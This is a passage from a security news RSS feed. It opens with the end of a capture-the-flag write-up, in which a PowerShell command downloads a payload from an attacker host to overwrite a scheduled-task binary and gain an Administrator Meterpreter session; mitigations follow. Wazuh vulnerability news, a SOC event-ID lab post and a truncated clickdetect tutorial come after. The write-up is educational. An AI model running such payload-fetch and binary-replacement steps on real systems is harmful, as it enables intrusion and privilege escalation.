Overwriting TFTP.EXE</h3><p>From the existing rupert Meterpreter session, download the payload directly to the target path using PowerShell's DownloadFile method:</p><pre>powershell -c "(New-Object Net.WebClient).DownloadFile('http://&lt;ATTACKER_IP&gt;:8000/tftp.exe','C:\Backup\TFTP.EXE')"</pre><p>DownloadFile writes the file to an exact specified path, making it more reliable than certutil for overwriting an existing binary at a known location.</p><p>The overwrite succeeds. The original TFTP.EXE was not locked by any running process — it executes briefly when the scheduler fires and exits immediately. With no active file lock, the binary can be replaced cleanly between scheduler invocations.</p><h3>5.4 Catching the Administrator Session</h3><p>Wait for the five-minute scheduled task cycle to complete. The scheduler invokes C:\Backup\TFTP.EXE under the Administrator account. The payload executes and connects back to the second Meterpreter handler.</p><p><strong>Session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><p>Administrator.</p><h3>6. Proof of Compromise</h3><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><h3>7. Vulnerability Summary</h3><pre>#   Vulnerability                                        Severity   Impact<br>--  ---------------------------------------------------  ---------  -----------------------------------------------<br>1   PHP allow_url_include enabled on XAMPP               Critical   Remote file inclusion enabling arbitrary RCE<br>2   User input passed to include() without sanitisation  Critical   LFI and RFI via ?page= parameter<br>3   TFTP.EXE world-writable by BUILTIN\Users             Critical   Scheduled task binary replaced — Admin session</pre><h3>8. Defense &amp; Mitigation</h3><h3>8.1 Remote File Inclusion — PHP allow_url_include Enabled</h3><p><strong>Root Cause:</strong> PHP’s allow_url_include directive was enabled in the XAMPP php.ini configuration. This setting permits include() and require() to accept full URLs as arguments, causing PHP to fetch and execute remote files as server-side code. Combined with unsanitised user input in the page parameter, this enabled complete remote code execution.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Disable </strong><strong>allow_url_include immediately and permanently.</strong> There is no legitimate production use case for this setting that cannot be achieved safely through other means. Set it to Off in php.ini:</li></ul><pre>allow_url_include = Off</pre><ul><li>Restart Apache after the change:</li></ul><pre># Linux<br>  systemctl restart apache2<br>  # Windows (XAMPP)<br>  # Use the XAMPP Control Panel or: net stop Apache2.4 &amp;&amp; net start Apache2.4</pre><ul><li><strong>Disable </strong><strong>allow_url_fopen as well, where external URL fetching is not required.</strong> This setting controls whether PHP's file functions can open remote URLs at all. Disabling it eliminates the underlying network fetch capability:</li></ul><pre>allow_url_fopen = Off</pre><ul><li><strong>Keep PHP up to date.</strong> allow_url_include was deprecated in PHP 7.4 and removed entirely in PHP 8.0. Upgrading to a supported PHP 8.x release eliminates the setting as a risk entirely. Running PHP 7.4 on a XAMPP installation in a production or lab context is indefensible — it receives no security patches.</li><li><strong>Harden XAMPP for any network-accessible deployment.</strong> XAMPP is a development stack. Its default configuration — allow_url_include on, phpMyAdmin accessible, MariaDB with no root password — is intentionally permissive for local development. Any XAMPP instance reachable from a network should be hardened against these defaults before use.</li></ul><h3>8.2 User Input Passed to include() Without Sanitisation</h3><p><strong>Root Cause:</strong> The index.php application passed $_GET['page'] directly into PHP's include() function. Any value — a relative path, an absolute path, or a full URL — was accepted and executed without validation, restriction, or sanitisation.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Never pass user-controlled input directly to </strong><strong>include(), </strong><strong>require(), or any file system function.</strong> This is a fundamental PHP security principle. If dynamic page loading is a genuine application requirement, it must be implemented through a strict allowlist — only known, pre-approved values should ever reach a file inclusion call:</li></ul><pre>$allowed_pages = [<br>      'home'  =&gt; 'home.php',<br>      'about' =&gt; 'about.php',<br>      'store' =&gt; 'store.php',<br>  ];<br>  $page = $allowed_pages[$_GET['page']] ?? 'home.php';<br>  include($page);</pre><ul><li>Any value not in the $allowed_pages array silently falls back to the default. An attacker passing a path traversal sequence or a remote URL receives the home page — nothing executes, nothing is disclosed.</li><li><strong>Set </strong><strong>open_basedir in </strong><strong>php.ini to restrict which directories PHP can access.</strong> Even if LFI is exploited, open_basedir confines file access to a specified directory tree and prevents reading files outside of it:</li></ul><pre>open_basedir = C:/xampp/htdocs/site/</pre><ul><li><strong>Conduct a source code review for all </strong><strong>include() and </strong><strong>require() calls.</strong> Every call to these functions in the codebase should be audited. Any that accepts external input without allowlist validation is a vulnerability. This is a straightforward static analysis task that should be part of any application security review.</li><li><strong>Use a Web Application Firewall as a compensating control.</strong> ModSecurity with the OWASP Core Rule Set detects path traversal sequences and remote URL patterns in parameters. It does not replace fixing the root cause, but it adds a meaningful detection and blocking layer.</li></ul><h3>8.3 World-Writable Scheduled Task Binary</h3><p><strong>Root Cause:</strong> C:\Backup\TFTP.EXE inherited (F) — full control — from the parent directory's ACL for BUILTIN\Users. Every authenticated user on the system could overwrite the binary. The scheduled task ran the binary as Administrator on a five-minute cycle. Any attacker with a low-privilege session could replace the binary and wait for the scheduler to provide an Administrator callback.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Remove write permissions for </strong><strong>BUILTIN\Users from any executable invoked by a privileged scheduled task or service.</strong> The binary should be readable and executable by the account running the task, and writable only by Administrators or SYSTEM. Correct the ACL immediately:</li></ul><pre>icacls C:\Backup\TFTP.EXE /remove:g "BUILTIN\Users"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Users:(RX)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "NT AUTHORITY\SYSTEM:(F)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Administrators:(F)"</pre><ul><li><strong>Apply the principle of least privilege to all scheduled task executables and service binaries.</strong> The rule is simple: an account that does not need to modify a binary must not have write access to it, regardless of what inherited permissions the parent directory grants. Audit all scheduled tasks and services regularly:</li></ul><pre>icacls C:\Path\To\TaskExecutable.exe</pre><ul><li>Any result showing (F), (M), or (W) for BUILTIN\Users, Everyone, or Authenticated Users is a critical finding.</li><li><strong>Review the ACL of the parent directory, not just the binary.</strong> The inherited permissions here originated from C:\Backup\ itself. Fixing the directory ACL prevents future executables placed there from inheriting the same dangerous permissions:</li></ul><pre>icacls C:\Backup /inheritance:r<br>  icacls C:\Backup /grant:r "NT AUTHORITY\SYSTEM:(OI)(CI)(F)"<br>  icacls C:\Backup /grant:r "BUILTIN\Administrators:(OI)(CI)(F)"</pre><ul><li><strong>Store scheduled task executables in root-owned, permission-restricted directories.</strong> System utilities and automation scripts used by privileged tasks belong in C:\Windows\System32\, C:\Program Files\, or a custom directory with a deliberately hardened ACL — not in a general-purpose directory like C:\Backup\ where default permissions may be overly permissive.</li><li><strong>Log and alert on modifications to scheduled task executables.</strong> Windows Event ID 4663 (file accessed) and 4670 (permissions changed) can be monitored via Windows Security Auditing or a SIEM. Any write to an executable invoked by a privileged scheduled task should generate an immediate alert:</li></ul><pre>auditpol /set /subcategory:"File System" /success:enable /failure:enable</pre><ul><li><strong>Apply File Integrity Monitoring to critical executables.</strong> Tools such as OSSEC, Wazuh, or Tripwire can monitor specified files for modification and alert in real time. C:\Backup\TFTP.EXE being overwritten between scheduler invocations would have generated an immediate alert with FIM in place.</li></ul><p><em>OffSec PG Play — for educational purposes only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ac72c40761ae" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/slort-rfi-via-php-allow-url-include-writable-scheduled-task-binary-to-administrator-offsec-pg-ac72c40761ae">Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence]]></title>
<description><![CDATA[A critical security flaw in Wazuh Manager has been disclosed that could allow remote attackers to manipulate security alerts, delete forensic evidence, and tamper with SIEM data across environments. The vulnerability carries a maximum CVSS score of 10.0, highlighting its…
Read more →
The post Cri...]]></description>
<link>https://tsecurity.de/de/3598795/it-security-nachrichten/critical-wazuh-vulnerability-lets-attackers-tamper-with-alerts-and-delete-security-evidence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598795/it-security-nachrichten/critical-wazuh-vulnerability-lets-attackers-tamper-with-alerts-and-delete-security-evidence/</guid>
<pubDate>Mon, 15 Jun 2026 12:38:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security flaw in Wazuh Manager has been disclosed that could allow remote attackers to manipulate security alerts, delete forensic evidence, and tamper with SIEM data across environments. The vulnerability carries a maximum CVSS score of 10.0, highlighting its…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-wazuh-vulnerability-lets-attackers-tamper-with-alerts-and-delete-security-evidence/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-wazuh-vulnerability-lets-attackers-tamper-with-alerts-and-delete-security-evidence/">Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence]]></title>
<description><![CDATA[A critical security flaw in Wazuh Manager has been disclosed that could allow remote attackers to manipulate security alerts, delete forensic evidence, and tamper with SIEM data across environments. The vulnerability carries a maximum CVSS score of 10.0, highlighting its severe impact and ease of...]]></description>
<link>https://tsecurity.de/de/3598649/it-security-nachrichten/critical-wazuh-vulnerability-lets-attackers-tamper-with-alerts-and-delete-security-evidence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598649/it-security-nachrichten/critical-wazuh-vulnerability-lets-attackers-tamper-with-alerts-and-delete-security-evidence/</guid>
<pubDate>Mon, 15 Jun 2026 11:38:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security flaw in Wazuh Manager has been disclosed that could allow remote attackers to manipulate security alerts, delete forensic evidence, and tamper with SIEM data across environments. The vulnerability carries a maximum CVSS score of 10.0, highlighting its severe impact and ease of exploitation. The issue affects Wazuh Manager version 5.0.0-beta1 and stems […]</p>
<p>The post <a href="https://cybersecuritynews.com/wazuh-vulnerability/">Critical Wazuh Vulnerability Lets Attackers Tamper with Alerts and Delete Security Evidence</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Wazuh Flaw Enables Threat Actors to Alter Alerts and Remove Logs]]></title>
<description><![CDATA[A critical security flaw in Wazuh Manager could allow unauthenticated threat actors to tamper with alerts, delete forensic evidence, and execute arbitrary OpenSearch operations by exploiting an input validation weakness in the platform’s new inventory synchronization pipeline. Tracked under GitHu...]]></description>
<link>https://tsecurity.de/de/3598209/it-security-nachrichten/critical-wazuh-flaw-enables-threat-actors-to-alter-alerts-and-remove-logs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598209/it-security-nachrichten/critical-wazuh-flaw-enables-threat-actors-to-alter-alerts-and-remove-logs/</guid>
<pubDate>Mon, 15 Jun 2026 08:23:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security flaw in Wazuh Manager could allow unauthenticated threat actors to tamper with alerts, delete forensic evidence, and execute arbitrary OpenSearch operations by exploiting an input validation weakness in the platform’s new inventory synchronization pipeline. Tracked under GitHub…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-wazuh-flaw-enables-threat-actors-to-alter-alerts-and-remove-logs/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-wazuh-flaw-enables-threat-actors-to-alter-alerts-and-remove-logs/">Critical Wazuh Flaw Enables Threat Actors to Alter Alerts and Remove Logs</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Wazuh Flaw Enables Alert Tampering and Evidence Deletion]]></title>
<description><![CDATA[A critical security vulnerability has been disclosed in Wazuh Manager 5.0, allowing any enrolled agent to smuggle arbitrary OpenSearch bulk operations through an unsanitized flatbuffer field, enabling attackers to delete alerts, destroy forensic evidence, and tamper with SIEM data across an entir...]]></description>
<link>https://tsecurity.de/de/3598134/it-security-nachrichten/critical-wazuh-flaw-enables-alert-tampering-and-evidence-deletion/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598134/it-security-nachrichten/critical-wazuh-flaw-enables-alert-tampering-and-evidence-deletion/</guid>
<pubDate>Mon, 15 Jun 2026 07:52:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security vulnerability has been disclosed in Wazuh Manager 5.0, allowing any enrolled agent to smuggle arbitrary OpenSearch bulk operations through an unsanitized flatbuffer field, enabling attackers to delete alerts, destroy forensic evidence, and tamper with SIEM data across an entire deployment. Published last week as GHSA-ff9g-85jq-r3g3, it carries a maximum CVSS 3.1 score of 10.0 […]</p>
<p>The post <a href="https://cyberpress.org/critical-wazuh-flaw/">Critical Wazuh Flaw Enables Alert Tampering and Evidence Deletion</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Wazuh Flaw Enables Threat Actors to Alter Alerts and Remove Logs]]></title>
<description><![CDATA[A critical security flaw in Wazuh Manager could allow unauthenticated threat actors to tamper with alerts, delete forensic evidence, and execute arbitrary OpenSearch operations by exploiting an input validation weakness in the platform’s new inventory synchronization pipeline. Tracked under GitHu...]]></description>
<link>https://tsecurity.de/de/3598133/it-security-nachrichten/critical-wazuh-flaw-enables-threat-actors-to-alter-alerts-and-remove-logs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598133/it-security-nachrichten/critical-wazuh-flaw-enables-threat-actors-to-alter-alerts-and-remove-logs/</guid>
<pubDate>Mon, 15 Jun 2026 07:52:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security flaw in Wazuh Manager could allow unauthenticated threat actors to tamper with alerts, delete forensic evidence, and execute arbitrary OpenSearch operations by exploiting an input validation weakness in the platform’s new inventory synchronization pipeline. Tracked under GitHub advisory GHSA-ff9g-85jq-r3g3, the vulnerability affects Wazuh Manager version 5.0.0-beta1 and carries a maximum CVSS score […]</p>
<p>The post <a href="https://gbhackers.com/critical-wazuh-flaw/">Critical Wazuh Flaw Enables Threat Actors to Alter Alerts and Remove Logs</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [kritisch] Wazuh Manager: Schwachstelle ermöglicht Privilegieneskalation]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Wazuh Manager ausnutzen, um seine Privilegien zu erhöhen.]]></description>
<link>https://tsecurity.de/de/3584240/it-security-nachrichten/neu-kritisch-wazuh-manager-schwachstelle-ermoeglicht-privilegieneskalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584240/it-security-nachrichten/neu-kritisch-wazuh-manager-schwachstelle-ermoeglicht-privilegieneskalation/</guid>
<pubDate>Tue, 09 Jun 2026 13:08:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Wazuh Manager ausnutzen, um seine Privilegien zu erhöhen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Reducing security operations complexity with Wazuh Cloud]]></title>
<description><![CDATA[Security teams are increasingly overwhelmed by alert fatigue, infrastructure maintenance, and complex hybrid environments. This article explores how Wazuh Cloud helps simplify SIEM/XDR operations through managed infrastructure, automated scaling, and AI-driven security analysis. [...]]]></description>
<link>https://tsecurity.de/de/3581744/it-security-nachrichten/reducing-security-operations-complexity-with-wazuh-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581744/it-security-nachrichten/reducing-security-operations-complexity-with-wazuh-cloud/</guid>
<pubDate>Mon, 08 Jun 2026 16:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security teams are increasingly overwhelmed by alert fatigue, infrastructure maintenance, and complex hybrid environments. This article explores how Wazuh Cloud helps simplify SIEM/XDR operations through managed infrastructure, automated scaling, and AI-driven security analysis. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[5 Windows Event IDs Every SOC Analyst Should Know (With Real Lab Evidence)]]></title>
<description><![CDATA[These aren’t just numbers from a study guide — they’re the fingerprints attackers leave behind. Here’s what each one looks like inside a real SIEM.By Ronak Mishra · Security+ Certified · Wazuh Home LabMost cybersecurity courses hand you a list of Windows Event IDs and tell you to memorize them. W...]]></description>
<link>https://tsecurity.de/de/3571869/hacking/5-windows-event-ids-every-soc-analyst-should-know-with-real-lab-evidence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571869/hacking/5-windows-event-ids-every-soc-analyst-should-know-with-real-lab-evidence/</guid>
<pubDate>Thu, 04 Jun 2026 10:21:44 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>These aren’t just numbers from a study guide — they’re the fingerprints attackers leave behind. Here’s what each one looks like inside a real SIEM.</h4><p>By Ronak Mishra · Security+ Certified · Wazuh Home Lab</p><p>Most cybersecurity courses hand you a list of Windows Event IDs and tell you to memorize them. What they don’t show you is what these events actually look like when they fire — the raw fields, the timestamps, the account names, the parent processes.</p><p>I set up a home lab running Wazuh SIEM connected to a Windows 11 agent and deliberately triggered each of these events to see exactly what gets captured. Every screenshot in this post is from that lab. No stock images, no theory — just real detections.</p><p>Here are the 5 event IDs that matter most when something bad is happening on a Windows machine.</p><p><strong>Event ID 4625 Failed logon attempt</strong></p><blockquote>“An attacker is outside your network trying passwords one by one, hoping something works. This is what it looks like inside your SIEM before they get in.”</blockquote><p>Event ID 4625 fires every time a Windows logon attempt fails. One or two of these is completely normal — people mistype passwords. But when you see a cluster of them hitting in rapid succession targeting the same account, that’s a brute force attack in progress.</p><p>The fields that matter most: targetUserName (who they’re targeting), subStatus (why it failed), and logonType (how they’re trying to get in). SubStatus code 0xc0000064 means the targeted user doesn’t even exist — a classic sign of username enumeration before a brute force.</p><p>I simulated this by running repeated failed logon attempts against a non-existent account called “fakeuser” on my Windows 11 VM. Here’s what Wazuh captured:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uO_J5UloBalrsiFH6Zbq2A.png"><figcaption>12 failed logon attempts against a non-existent user, captured in Wazuh in under 2 minutes. The spike on the right shows the exact moment the attempts were made.</figcaption></figure><p>Expanding one of those alerts reveals exactly what happened at the field level — the targeted account name, the failure reason code, and the plain-English confirmation from Windows itself:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uqbu6PO1boxwZ6si5R3xdg.png"><figcaption>subStatus 0xc0000064 confirms the targeted account doesn’t exist. The event ID 4625 is highlighted in yellow by Wazuh — and Windows confirms it in plain English at the bottom.</figcaption></figure><p><strong>Event ID 4688 New process created</strong></p><blockquote>“Malware can’t do anything without running a process. This event fires the moment something executes — including the tools attackers use to steal credentials or move through a network.”</blockquote><p>Every time a new process starts on Windows, Event ID 4688 fires — if process creation auditing is enabled. The key isn’t just what process ran, it’s what spawned it. The parent-child relationship tells the real story.</p><p>A legitimate user opening Notepad looks completely different from malware spawning PowerShell from inside a Word document. In an attack scenario, watch for: PowerShell or cmd spawned by Office applications, encoded command line arguments, or executables running from temp folders.</p><p>I triggered this by launching cmd, PowerShell, and Notepad from my Windows VM. Wazuh captured 345 process creation events — the spike you see in the chart is the exact moment those commands ran:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X_mI5GD9gfhVcW0TAgojqg.png"><figcaption>345 process creation events captured — the spike at 20:29 is when the test commands executed. Row 1 shows Notepad being spawned by Notepad itself, row 2 shows PowerShell as the parent process.</figcaption></figure><p>The expanded view shows the full execution chain in one log entry — exactly what process ran, what launched it, and who triggered it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5zPKT7oOwM-0W74fY-phvA.png"><figcaption>newProcessName shows what ran. parentProcessName shows PowerShell launched it. In a real attack this parent-child chain is where you catch malicious execution.</figcaption></figure><p><strong>Event ID 4720 User account created</strong></p><blockquote>“The attacker is already inside. Now they’re creating a backdoor account so they can return even if their original access gets cut off.”</blockquote><p>Event ID 4720 fires whenever a new local or domain user account is created. In a normal environment this should be rare and expected — IT provisioning a new employee, for example. If you see this event at 2am, created by a non-admin process, with no change ticket backing it up, that’s a persistence mechanism being installed.</p><p>This maps directly to MITRE ATT&amp;CK T1136 — Create Account. It’s one of the most reliable persistence indicators in Windows environments because attackers almost always need a fallback entry point.</p><p>I created a test account called “testattacker” using PowerShell to simulate this. Wazuh caught it immediately — a single isolated event with zero noise around it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fA0xpczARnXj6ZfJ3PuWVg.png"><figcaption>1 hit. That’s it. One account creation event isolated at 20:37 — both samAccountName and targetUserName confirm the backdoor account name: testattacker.</figcaption></figure><p>The expanded view shows every detail Wazuh captured — the account name, who created it, and the event ID confirmed in yellow:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Wab9Fvo5SnaYgH6-3TZJ1Q.png"><figcaption>samAccountName and targetUserName both show testattacker. subjectUserName shows ronakmishra — the account that created it. Event ID 4720 highlighted in yellow by Wazuh.</figcaption></figure><p><strong>Event ID 4663 File or object accessed</strong></p><blockquote>“Ransomware touches hundreds of files in seconds. A credential-stealing tool targets one specific file. Either way — this event is watching.”</blockquote><p>Event ID 4663 logs access attempts to specific files and folders when auditing is enabled. In Wazuh, the File Integrity Monitoring module captures this same behavior in real time — logging every file that gets created, modified, or deleted in monitored directories, including SHA1 and MD5 hashes before and after so you can prove exactly what changed.</p><p>Ransomware behavior looks like hundreds of these events firing in rapid sequence across multiple directories. A targeted attack looks like one precise access to a credential store or sensitive config file. Volume and pattern are everything.</p><p>My Wazuh FIM is running in realtime mode on monitored directories. I created a file called “you are hacked.txt” to trigger it deliberately. Here’s what got captured the moment that file was created:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ohvTMhz7_0TvchgmdYkYXA.png"><figcaption>Wazuh FIM detected the file in real time — path, user, SHA1 hash, and permissions all captured the moment it appeared. The filename makes the scenario obvious.</figcaption></figure><p><strong>How to think about these as a SOC analyst</strong></p><p>Knowing what each event ID means in isolation is only half the skill. The real work is correlation — one event rarely tells the full story. Here’s how these connect in real attack scenarios:</p><ul><li>Multiple 4625s from one source followed by a 4624 right after — brute force that succeeded</li><li>4688 showing PowerShell spawned by an Office application — likely a phishing payload executing</li><li>4720 outside business hours with no change ticket — unauthorized persistence attempt</li><li>Hundreds of 4663s firing across many files in under 30 seconds — ransomware encryption in progress</li></ul><p>That pattern — two or more signals, a time window, a threshold — is the foundation of detection engineering. It’s what separates someone who reads logs from someone who builds detection rules. And it’s exactly the thinking SOC roles are looking for in interviews.</p><blockquote><strong>I’m building out more detection scenarios in my home lab and documenting everything as I go — Wazuh, Splunk, MITRE ATT&amp;CK mapping, and more. If you’re on the same path — studying for CySA+, building your first SIEM lab, or working toward your first SOC role — feel free to connect on LinkedIn. Always good to compare notes with people actually doing the work.</strong></blockquote><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9bf8d1f88bca" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/5-windows-event-ids-every-soc-analyst-should-know-with-real-lab-evidence-9bf8d1f88bca">5 Windows Event IDs Every SOC Analyst Should Know (With Real Lab Evidence)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Extending Wazuh detection capabilities with clickdetect, Opensearch PPL and Sigma Rules]]></title>
<description><![CDATA[Extending Wazuh detection capabilities with clickdetect, Opensearch PPL and Sigma Rules - ClickdetectHey, souzo here. If you’ve ever wanted alerting rules that actually work in Wazuh without fighting OpenSearch’s detection engine, this post is for you.Repository: https://github.com/clicksiem/clic...]]></description>
<link>https://tsecurity.de/de/3554031/hacking/extending-wazuh-detection-capabilities-with-clickdetect-opensearch-ppl-and-sigma-rules/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554031/hacking/extending-wazuh-detection-capabilities-with-clickdetect-opensearch-ppl-and-sigma-rules/</guid>
<pubDate>Thu, 28 May 2026 14:09:47 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Extending Wazuh detection capabilities with clickdetect, Opensearch PPL and Sigma Rules - Clickdetect</h3><p>Hey, souzo here. If you’ve ever wanted alerting rules that actually work in Wazuh without fighting OpenSearch’s detection engine, this post is for you.</p><blockquote><em>Repository: </em><a href="https://github.com/clicksiem/clickdetect"><em>https://github.com/clicksiem/clickdetect</em></a></blockquote><p>In this blog post I will guide you to:</p><ul><li>Install and configure Opensearch PPL in an existing Wazuh environment</li><li>Install and configure clickdetect</li><li>Write Opensearch PPL</li><li>Write Sigma rules with Opensearch PPL</li><li>Detect threats with your Wazuh data extending wazuh detetion capabilities</li></ul><h3><strong>Introduction</strong></h3><p>After working many years with wazuh and opensearch, I wanted some features that currently not exists or are so broken to work with.</p><p>OpenSearch has been working to transform its product into a complete SIEM with a detection engine, however… it’s <strong>VERY buggy</strong>. I tested it several times with real data and always ended up with a corrupted index.</p><p>I looked into Elastalert, but I didn’t like its engine; I found the code and maintenance too confusing. Also, why create a rules system when I can use the datasource’s own language? So instead of forking, I created my own solution.</p><p>I created <a href="https://github.com/clicksiem/clickdetect">ClickDetect</a> to help security teams around the world have an additional tool for generating alerts.</p><h3>Architecture</h3><p>Here’s how all the pieces fit together:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*D_Tzmv1hLi8VQxUS.png"></figure><p>Wazuh ships events into the OpenSearch indexer. Clickdetect queries the indexer using PPL (or compiled Sigma rules), evaluates the configured rules on a schedule, and fires alerts to your webhooks when a condition is met.</p><h3>Clickdetect</h3><p>Clickdetect is an alerting system tool created to help you to create your detection strategy in whatever datasource you want.</p><p>Clickdetect has many datasources supported like: — Clickhouse (+sigma) — Opensearch + Opensearch PPL (+sigma) — Elasticsearch — Victorialogs — PostgreSQL — Loki (+sigma) — Databricks</p><p>Clickdetect is multi-tenant by default, you can specify tenant in rules too.</p><h3>Sigma</h3><p>Clickdetect v1.4.0 actually supports sigma backend. Check out the documentation <a href="https://clickdetect.souzo.me/sigma/">https://clickdetect.souzo.me/sigma/</a></p><h3>Opensearch &amp; Opensearch PPL</h3><p>I created ClickDetect to work primarily with ClickHouse because, in my opinion, it’s a better alternative, as it allows for magnificent data compression, which directly impacts the price of SOC services. Furthermore, wazuh’s data is structured, so the ClickHouse JSON column makes more sense (My opinion).</p><p>But in this post I will show that it’s possible to use ClickDetect with OpenSearch.</p><h3>PPL (Piped Processing Language)</h3><p>Opensearchppl is used to search, filter, and analyze data in an easy and intuitive way. It’s very similar to the LogQL language of Loki or Splunk SPL.</p><p>This greatly increases the possibility of turning OpenSearch into a SIEM instead of running queries in the standard DSL format.</p><h4>Why not SQL?</h4><p>If you want SQL, try clickhouse or postgresql of tigerdata. PPL makes more sense for Opensearch environment.</p><h3>Let’s bora</h3><h3>Installing Opensearch PPL in Wazuh</h3><p>Following the documentation, we first need to install SQL plugin <a href="https://docs.opensearch.org/latest/sql-and-ppl/ppl/index/">https://docs.opensearch.org/latest/sql-and-ppl/ppl/index/</a>.</p><p>Your openseach configurations and binaries are in the directory /usr/share/wazuh-indexer/. Change your directory</p><pre>cd /usr/share/wazuh-indexer/</pre><p>First, verify if your opensearch does not have Opensearch SQL Plugin installed. The plugin usually comes pre-installed with Wazuh.</p><pre>./bin/opensearch-plugin list</pre><p>If the plugin is not installed, install it.</p><pre>bin/opensearch-plugin install opensearch-sql</pre><p>Restart your wazuh indexer</p><pre>systemctl restart wazuh-indexer</pre><p>Now It’s fully operational.</p><h3>Installing and configuring clickdetect</h3><h3>Creating rules</h3><pre>mkdir -p rules/<br>cat &lt;&lt; EOF &gt; rules/manager_started.yml<br>id: $(cat /proc/sys/kernel/random/uuid)<br>name: "Wazuh opensearch sigma test - Manager Started"<br>level: 10<br>size: "&gt;0"<br>active: true<br>author: <br>    - Vinicius Morais &lt;me@souzo.me&gt;<br>group: base_rule<br>tags: <br>    - base<br>rule: |-<br>    search source=wazuh-alerts-* | where rule.id='502' and `@timestamp` &gt;= DATE_SUB(NOW(), INTERVAL 5 HOUR )<br>EOF</pre><h3>Creating runner</h3><p>You need to configure a runner, runner is a file that configure the schedulers, webhooks and the datasource.</p><p>For this example, we will use “teams” as the webhook and configure the detector to run every 5 minute.</p><pre>cat &lt;&lt; EOF &gt; runner.yml<br>datasource:<br>    type: opensearch-ppl<br>    url: https://127.0.0.1:9200<br>    username: wazuh<br>    password: wazuh-adm<br>    verify: false<br><br>webhooks:<br>    teams_alert:<br>        type: teams<br>        url: https://&lt;your_companie&gt;.webhook.office.com/...<br>        timeout: 10<br>        verify: false<br><br>detectors:<br>    my_detector:<br>        name: "5m interval"<br>        for: "5m"<br>        description: "detect rules with 5 min interval"<br>        rules:<br>            - "/app/rules/*"<br>        webhooks:<br>            - 